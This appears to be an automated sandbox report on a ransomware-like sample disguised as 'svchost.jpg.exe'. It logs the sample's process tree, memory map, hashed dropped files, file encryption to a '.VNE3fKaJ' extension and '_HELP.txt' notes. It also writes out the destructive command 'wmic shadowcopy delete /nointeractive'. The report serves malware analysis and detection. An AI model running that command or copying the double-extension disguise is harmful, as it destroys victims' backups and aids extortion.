89f35f20...01a1

Monitored Processes

Process Overview

ID	PID	Monitor Reason	Integrity Level	Image Name	Command Line	Origin ID
#1	0x964	Analysis Target	High (Elevated)	svchost.jpg.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\svchost.jpg.exe"	-
#2	0x96c	Child Process	High (Elevated)	cmd.exe	C:\Windows\system32\cmd.exe /c C:\Users\5P5NRG~1\AppData\Local\Temp\notepad.vbs	#1
#3	0x990	Child Process	High (Elevated)	wscript.exe	"C:\Windows\System32\WScript.exe" "C:\Users\5P5NRG~1\AppData\Local\Temp\notepad.vbs"	#2
#4	0x9cc	Child Process	High (Elevated)	wmic.exe	"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive	#3

Behavior Information - Grouped by Category

Process #1: svchost.jpg.exe

9271

497

Information	Value
ID	#1
File Name	c:\users\5p5nrgjn0js halpmcxz\desktop\svchost.jpg.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\svchost.jpg.exe"
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor	Start Time: 00:00:17, Reason: Analysis Target
Unmonitor	End Time: 00:04:05, Reason: Terminated by Timeout
Monitor Duration	00:03:48

OS Process Information

Information	Value
PID	0x964
Parent PID	0x458 (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 968 0x B58 0x B60 0x B64 0x BB4 0x 80C 0x 734 0x 85C 0x 840 0x 83C 0x 724

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x0003ffff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	r	-
locale.nls	0x00070000	0x000d6fff	Memory Mapped File	r	-
imm32.dll	0x000e0000	0x000fdfff	Memory Mapped File	r	-
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	rw	-
pagefile_0x00000000000f0000	0x000f0000	0x000f6fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000100000	0x00100000	0x00101fff	Pagefile Backed Memory	rw	-
private_0x0000000000110000	0x00110000	0x0014ffff	Private Memory	rw	-
private_0x0000000000170000	0x00170000	0x001affff	Private Memory	rw	-
private_0x00000000001d0000	0x001d0000	0x0020ffff	Private Memory	rw	-
private_0x0000000000220000	0x00220000	0x0025ffff	Private Memory	rw	-
svchost.jpg.exe	0x00280000	0x002f0fff	Memory Mapped File	rwx	... Region Actions Download Dump
pagefile_0x0000000000300000	0x00300000	0x00487fff	Pagefile Backed Memory	r	-
private_0x00000000004b0000	0x004b0000	0x005affff	Private Memory	rw	-
pagefile_0x00000000005b0000	0x005b0000	0x00730fff	Pagefile Backed Memory	r	-
private_0x0000000000770000	0x00770000	0x007effff	Private Memory	rw	-
private_0x0000000000830000	0x00830000	0x0086ffff	Private Memory	rw	-
private_0x0000000000890000	0x00890000	0x0098ffff	Private Memory	rw	-
private_0x00000000009b0000	0x009b0000	0x00aaffff	Private Memory	rw	-
pagefile_0x0000000000ab0000	0x00ab0000	0x01eaffff	Pagefile Backed Memory	r	-
sortdefault.nls	0x01eb0000	0x0217efff	Memory Mapped File	r	-
kernelbase.dll.mui	0x02180000	0x0223ffff	Memory Mapped File	rw	-
private_0x0000000002240000	0x02240000	0x0243ffff	Private Memory	rw	-
private_0x0000000002240000	0x02240000	0x0236ffff	Private Memory	rw	-
private_0x00000000022d0000	0x022d0000	0x0230ffff	Private Memory	rw	-
private_0x0000000002330000	0x02330000	0x0236ffff	Private Memory	rw	-
private_0x0000000002380000	0x02380000	0x023bffff	Private Memory	rw	-
private_0x0000000002400000	0x02400000	0x0243ffff	Private Memory	rw	-
private_0x0000000002490000	0x02490000	0x024cffff	Private Memory	rw	-
private_0x00000000024d0000	0x024d0000	0x0250ffff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x025bffff	Private Memory	rw	-
private_0x00000000025c0000	0x025c0000	0x026bffff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x026fffff	Private Memory	rw	-
private_0x00000000026f0000	0x026f0000	0x027effff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028effff	Private Memory	rw	-
private_0x0000000002920000	0x02920000	0x02a1ffff	Private Memory	rw	-
pagefile_0x0000000002a20000	0x02a20000	0x02e12fff	Pagefile Backed Memory	r	-
private_0x0000000002e20000	0x02e20000	0x02f1ffff	Private Memory	rw	-
private_0x0000000002f20000	0x02f20000	0x0301ffff	Private Memory	rw	-
private_0x00000000030a0000	0x030a0000	0x030dffff	Private Memory	rw	-
private_0x0000000003170000	0x03170000	0x0326ffff	Private Memory	rw	-
private_0x0000000003370000	0x03370000	0x0346ffff	Private Memory	rw	-
private_0x00000000034a0000	0x034a0000	0x0359ffff	Private Memory	rw	-
private_0x00000000035f0000	0x035f0000	0x036effff	Private Memory	rw	-
private_0x0000000003820000	0x03820000	0x0391ffff	Private Memory	rw	-
dhcpcsvc.dll	0x74c20000	0x74c31fff	Memory Mapped File	rwx	-
gpapi.dll	0x74c40000	0x74c55fff	Memory Mapped File	rwx	-
userenv.dll	0x74c60000	0x74c76fff	Memory Mapped File	rwx	-
bcryptprimitives.dll	0x74c80000	0x74cbcfff	Memory Mapped File	rwx	-
bcrypt.dll	0x74cc0000	0x74cd6fff	Memory Mapped File	rwx	-
wow64cpu.dll	0x74d90000	0x74d97fff	Memory Mapped File	rwx	-
wow64win.dll	0x74da0000	0x74dfbfff	Memory Mapped File	rwx	-
wow64.dll	0x74e00000	0x74e3efff	Memory Mapped File	rwx	-
rsaenh.dll	0x74e60000	0x74e9afff	Memory Mapped File	rwx	-
cryptsp.dll	0x74ea0000	0x74eb5fff	Memory Mapped File	rwx	-
profapi.dll	0x74ec0000	0x74ecafff	Memory Mapped File	rwx	-
ncrypt.dll	0x74ed0000	0x74f07fff	Memory Mapped File	rwx	-
secur32.dll	0x74f40000	0x74f47fff	Memory Mapped File	rwx	-
schannel.dll	0x74f50000	0x74f89fff	Memory Mapped File	rwx	-
fwpuclnt.dll	0x74f90000	0x74fc7fff	Memory Mapped File	rwx	-
rasadhlp.dll	0x74fd0000	0x74fd5fff	Memory Mapped File	rwx	-
dnsapi.dll	0x74fe0000	0x75023fff	Memory Mapped File	rwx	-
wship6.dll	0x75030000	0x75035fff	Memory Mapped File	rwx	-
wshtcpip.dll	0x75040000	0x75044fff	Memory Mapped File	rwx	-
mswsock.dll	0x75050000	0x7508bfff	Memory Mapped File	rwx	-
credssp.dll	0x75100000	0x75107fff	Memory Mapped File	rwx	-
winnsi.dll	0x75160000	0x75166fff	Memory Mapped File	rwx	-
iphlpapi.dll	0x75170000	0x7518bfff	Memory Mapped File	rwx	-
webio.dll	0x75190000	0x751defff	Memory Mapped File	rwx	-
winhttp.dll	0x751e0000	0x75237fff	Memory Mapped File	rwx	-
wkscli.dll	0x75240000	0x7524efff	Memory Mapped File	rwx	-
srvcli.dll	0x75250000	0x75268fff	Memory Mapped File	rwx	-
netutils.dll	0x75270000	0x75278fff	Memory Mapped File	rwx	-
netapi32.dll	0x75280000	0x75290fff	Memory Mapped File	rwx	-
cryptbase.dll	0x753a0000	0x753abfff	Memory Mapped File	rwx	-
sspicli.dll	0x753b0000	0x7540ffff	Memory Mapped File	rwx	-
usp10.dll	0x75410000	0x754acfff	Memory Mapped File	rwx	-
user32.dll	0x756f0000	0x757effff	Memory Mapped File	rwx	-
kernel32.dll	0x75a20000	0x75b2ffff	Memory Mapped File	rwx	-
advapi32.dll	0x75b30000	0x75bcffff	Memory Mapped File	rwx	-
shlwapi.dll	0x75ce0000	0x75d36fff	Memory Mapped File	rwx	-
msctf.dll	0x75d40000	0x75e0bfff	Memory Mapped File	rwx	-
msvcrt.dll	0x75e30000	0x75edbfff	Memory Mapped File	rwx	-
crypt32.dll	0x76190000	0x762acfff	Memory Mapped File	rwx	-
sechost.dll	0x762b0000	0x762c8fff	Memory Mapped File	rwx	-
lpk.dll	0x762d0000	0x762d9fff	Memory Mapped File	rwx	-
ws2_32.dll	0x764c0000	0x764f4fff	Memory Mapped File	rwx	-
imm32.dll	0x76500000	0x7655ffff	Memory Mapped File	rwx	-
kernelbase.dll	0x765f0000	0x76635fff	Memory Mapped File	rwx	-
msasn1.dll	0x772c0000	0x772cbfff	Memory Mapped File	rwx	-
rpcrt4.dll	0x772d0000	0x773bffff	Memory Mapped File	rwx	-
gdi32.dll	0x773c0000	0x7744ffff	Memory Mapped File	rwx	-
private_0x0000000077450000	0x77450000	0x77549fff	Private Memory	rwx	-
private_0x0000000077550000	0x77550000	0x7766efff	Private Memory	rwx	-
ntdll.dll	0x77670000	0x77818fff	Memory Mapped File	rwx	-
nsi.dll	0x77820000	0x77825fff	Memory Mapped File	rwx	-
ntdll.dll	0x77850000	0x779cffff	Memory Mapped File	rwx	-
private_0x000000007ef9b000	0x7ef9b000	0x7ef9dfff	Private Memory	rw	-
private_0x000000007ef9e000	0x7ef9e000	0x7efa0fff	Private Memory	rw	-
private_0x000000007efa1000	0x7efa1000	0x7efa3fff	Private Memory	rw	-
private_0x000000007efa4000	0x7efa4000	0x7efa6fff	Private Memory	rw	-
private_0x000000007efa7000	0x7efa7000	0x7efa9fff	Private Memory	rw	-
private_0x000000007efaa000	0x7efaa000	0x7efacfff	Private Memory	rw	-
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	rw	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	rw	-
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	rw	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Created Files

Filename	File Size	Hash Values	Actions
C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\photograph.png.VNE3fKaJ	24.22 KB	MD5: 856081727b71205daaa51425fb7046c6 SHA1: ceefe266fb2703a7b73386c4ebb364a28d53e324 SHA256: b6b4345fabe8a7269448762a4bcd5034cfd52d11fa10b54f1bb007be9fa09c5b SSDeep: 384:p9QrBGoSZCxXTLFhvpT+aEg+laPQY3YCJQm7/rih0WNV0RzxYN9+iNSy2Dw:p+/BXTLFhvpTSu3D7roPz+l49Aw	... File Actions Show Properties Download
C:\MSOCache\All Users\{90140000-0016-0409-1000-0000000FF1CE}-C\Setup.xml.VNE3fKaJ	2.25 KB	MD5: fa26b644569b22e7400e3e3b09a15b56 SHA1: f6a5706d79eca9776d7ad347dfed61412a13f153 SHA256: 0a84b4cf3a8e590c54eebc36d617275b1d9a4aa8d1a81bf8887547559fed4410 SSDeep: 48:bxhKDAGAgiNuvPCQY+RfDaY96/GM2YLquT/IQgqAsU:zKDA0gunCQY+RDa9/j7dgXsU	... File Actions Show Properties Download
C:\MSOCache\All Users\{90140000-0016-0409-1000-0000000FF1CE}-C\ExcelMUI.xml.VNE3fKaJ	1.53 KB	MD5: aafc6fadf396126d1493d45e4ab2e522 SHA1: 464ad07e620ac3513fdf0a6593e5907b9248a615 SHA256: 4ed618e9c889ef2b2fb9389545203c82f768e0e136564e8e2228b1b99b6ddbc7 SSDeep: 24:bjs6VAZuZ7t5Iunei0SiDUybw0w5Qqo5kMpLkoZwnPJ90IaEd51rVuHd7u5eTSTa:bFVA0ZyiTyU0+Km312JeTzCz	... File Actions Show Properties Download
C:\Users\5P5NRG~1\AppData\Local\Temp\notepad.vbs	0.25 KB	MD5: 63b8523edc05ea6c81480dd6a3cce310 SHA1: d52e00a8a62f9760a6f25bd02fcee99bcbe0a006 SHA256: 12e2d89e3e42b299fff86a00e89f5755d19547c4ed7c20bb83470a74c984f37b SSDeep: 6:j+q9NhtLk+hit8OEf2MMfGDG0Emy11Grsn:Kq7k+hit8ZdMfexSUs	... File Actions Show Properties Download
C:\MSOCache\All Users\{90140000-0016-0409-1000-0000000FF1CE}-C\_HELP.txt	0.23 KB	MD5: a8b45225d9d555bd9c58436519d17868 SHA1: 3d3e60792a3d8779af9419fbf85c70beb63f6e67 SHA256: ac277d82c1ace787402e6c9e2c8896be3c0cccc73f26359b2cdbbef6d14e6688 SSDeep: 6:Ao5xCi+m6fmrMjnElZKfwvRvp8ATWFcJaev27TAjtG3KUWoPdz:AWzOewzg/RK4aev27T3UgZ	... File Actions Show Properties Download

Host Behavior

File (6146)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\5P5NRG~1\AppData\Local\Temp\notepad.vbs	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\MSOCache\All Users\{90140000-0016-0409-1000-0000000FF1CE}-C\ExcelMUI.msi	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\MSOCache\All Users\{90140000-0016-0409-1000-0000000FF1CE}-C\ExcelMUI.msi.VNE3fKaJ	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\MSOCache\All Users\{90140000-0016-0409-1000-0000000FF1CE}-C\_HELP.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\MSOCache\All Users\{90140000-0016-0409-1000-0000000FF1CE}-C\ExcelMUI.xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\MSOCache\All Users\{90140000-0016-0409-1000-0000000FF1CE}-C\ExcelMUI.xml.VNE3fKaJ	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\MSOCache\All Users\{90140000-0016-0409-1000-0000000FF1CE}-C\_HELP.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\MSOCache\All Users\{90140000-0016-0409-1000-0000000FF1CE}-C\Setup.xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\MSOCache\All Users\{90140000-0016-0409-1000-0000000FF1CE}-C\Setup.xml.VNE3fKaJ	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\MSOCache\All Users\{90140000-0018-0409-1000-0000000FF1CE}-C\PowerPointMUI.msi	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\MSOCache\All Users\{90140000-0018-0409-1000-0000000FF1CE}-C\PowerPointMUI.msi.VNE3fKaJ	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\MSOCache\All Users\{90140000-0018-0409-1000-0000000FF1CE}-C\_HELP.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\MSOCache\All Users\{90140000-0018-0409-1000-0000000FF1CE}-C\PowerPointMUI.xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\MSOCache\All Users\{90140000-0018-0409-1000-0000000FF1CE}-C\PowerPointMUI.xml.VNE3fKaJ	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\MSOCache\All Users\{90140000-0018-0409-1000-0000000FF1CE}-C\_HELP.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\MSOCache\All Users\{90140000-0018-0409-1000-0000000FF1CE}-C\Setup.xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\MSOCache\All Users\{90140000-0018-0409-1000-0000000FF1CE}-C\Setup.xml.VNE3fKaJ	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\MSOCache\All Users\{90140000-0019-0409-1000-0000000FF1CE}-C\PublisherMUI.msi	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\MSOCache\All Users\{90140000-0019-0409-1000-0000000FF1CE}-C\PublisherMUI.msi.VNE3fKaJ	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\MSOCache\All Users\{90140000-0019-0409-1000-0000000FF1CE}-C\_HELP.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\MSOCache\All Users\{90140000-0019-0409-1000-0000000FF1CE}-C\PublisherMUI.xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\MSOCache\All Users\{90140000-0019-0409-1000-0000000FF1CE}-C\PublisherMUI.xml.VNE3fKaJ	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\MSOCache\All Users\{90140000-0019-0409-1000-0000000FF1CE}-C\_HELP.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\MSOCache\All Users\{90140000-0019-0409-1000-0000000FF1CE}-C\Setup.xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\MSOCache\All Users\{90140000-0019-0409-1000-0000000FF1CE}-C\Setup.xml.VNE3fKaJ	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\MSOCache\All Users\{90140000-001A-0409-1000-0000000FF1CE}-C\OutlookMUI.msi	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\MSOCache\All Users\{90140000-001A-0409-1000-0000000FF1CE}-C\OutlookMUI.msi.VNE3fKaJ	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\MSOCache\All Users\{90140000-001A-0409-1000-0000000FF1CE}-C\_HELP.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	2	Fn
Create	C:\MSOCache\All Users\{90140000-001A-0409-1000-0000000FF1CE}-C\OutlookMUI.xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\MSOCache\All Users\{90140000-001A-0409-1000-0000000FF1CE}-C\OutlookMUI.xml.VNE3fKaJ	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\MSOCache\All Users\{90140000-001A-0409-1000-0000000FF1CE}-C\_HELP.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\MSOCache\All Users\{90140000-001A-0409-1000-0000000FF1CE}-C\Setup.xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\MSOCache\All Users\{90140000-001A-0409-1000-0000000FF1CE}-C\Setup.xml.VNE3fKaJ	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\Setup.xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\Setup.xml.VNE3fKaJ	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\_HELP.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\WordMUI.msi	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\WordMUI.msi.VNE3fKaJ	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\_HELP.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\WordMUI.xml	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\WordMUI.xml.VNE3fKaJ	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\_HELP.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\MSOCache\All Users\{90140000-002C-0409-1000-0000000FF1CE}-C\Proof.en\Proof.msi	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\MSOCache\All Users\{90140000-002C-0409-1000-0000000FF1CE}-C\Proof.en\Proof.msi.VNE3fKaJ	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\_HELP.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\photograph.png	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\photograph.png.VNE3fKaJ	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\_HELP.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png	desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-background.png.VNE3fKaJ	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Get Info	C:\Users\5P5NRG~1\AppData\Local\Temp\notepad.vbs	type = file_type	1	Fn
Get Info	C:\Windows\system32\cmd.exe	type = file_attributes	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-0016-0409-1000-0000000FF1CE}-C\ExcelMUI.msi	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-0016-0409-1000-0000000FF1CE}-C\_HELP.txt	type = file_type	2	Fn
Get Info	C:\MSOCache\All Users\{90140000-0016-0409-1000-0000000FF1CE}-C\ExcelMUI.xml	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-0016-0409-1000-0000000FF1CE}-C\_HELP.txt	type = file_type	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-0016-0409-1000-0000000FF1CE}-C\Setup.xml	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-0018-0409-1000-0000000FF1CE}-C\PowerPointMUI.msi	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-0018-0409-1000-0000000FF1CE}-C\_HELP.txt	type = file_type	2	Fn
Get Info	C:\MSOCache\All Users\{90140000-0018-0409-1000-0000000FF1CE}-C\PowerPointMUI.xml	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-0018-0409-1000-0000000FF1CE}-C\_HELP.txt	type = file_type	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-0018-0409-1000-0000000FF1CE}-C\Setup.xml	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-0019-0409-1000-0000000FF1CE}-C\PublisherMUI.msi	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-0019-0409-1000-0000000FF1CE}-C\_HELP.txt	type = file_type	2	Fn
Get Info	C:\MSOCache\All Users\{90140000-0019-0409-1000-0000000FF1CE}-C\PublisherMUI.xml	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-0019-0409-1000-0000000FF1CE}-C\_HELP.txt	type = file_type	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-0019-0409-1000-0000000FF1CE}-C\Setup.xml	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-001A-0409-1000-0000000FF1CE}-C\OutlookMUI.msi	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-001A-0409-1000-0000000FF1CE}-C\_HELP.txt	type = file_type	2	Fn
Get Info	C:\MSOCache\All Users\{90140000-001A-0409-1000-0000000FF1CE}-C\OutlookMUI.xml	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-001A-0409-1000-0000000FF1CE}-C\_HELP.txt	type = file_type	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-001A-0409-1000-0000000FF1CE}-C\Setup.xml	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\Setup.xml	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\_HELP.txt	type = file_type	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\WordMUI.msi	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\_HELP.txt	type = file_type	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\WordMUI.xml	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\_HELP.txt	type = file_type	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-002C-0409-1000-0000000FF1CE}-C\Proof.en\Proof.msi	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-002C-0409-1000-0000000FF1CE}-C\Proof.en\Proof.msi	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-002C-0409-1000-0000000FF1CE}-C\Proof.en\Proof.msi	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-002C-0409-1000-0000000FF1CE}-C\Proof.en\Proof.msi	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\_HELP.txt	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\_HELP.txt	type = size	1	Fn
Get Info	-	type = size	1	Fn
Get Info	C:\MSOCache\All Users\{90140000-001B-0409-1000-0000000FF1CE}-C\_HELP.txt	type = size	1	Fn
Get Info	-	type = size	1	Fn
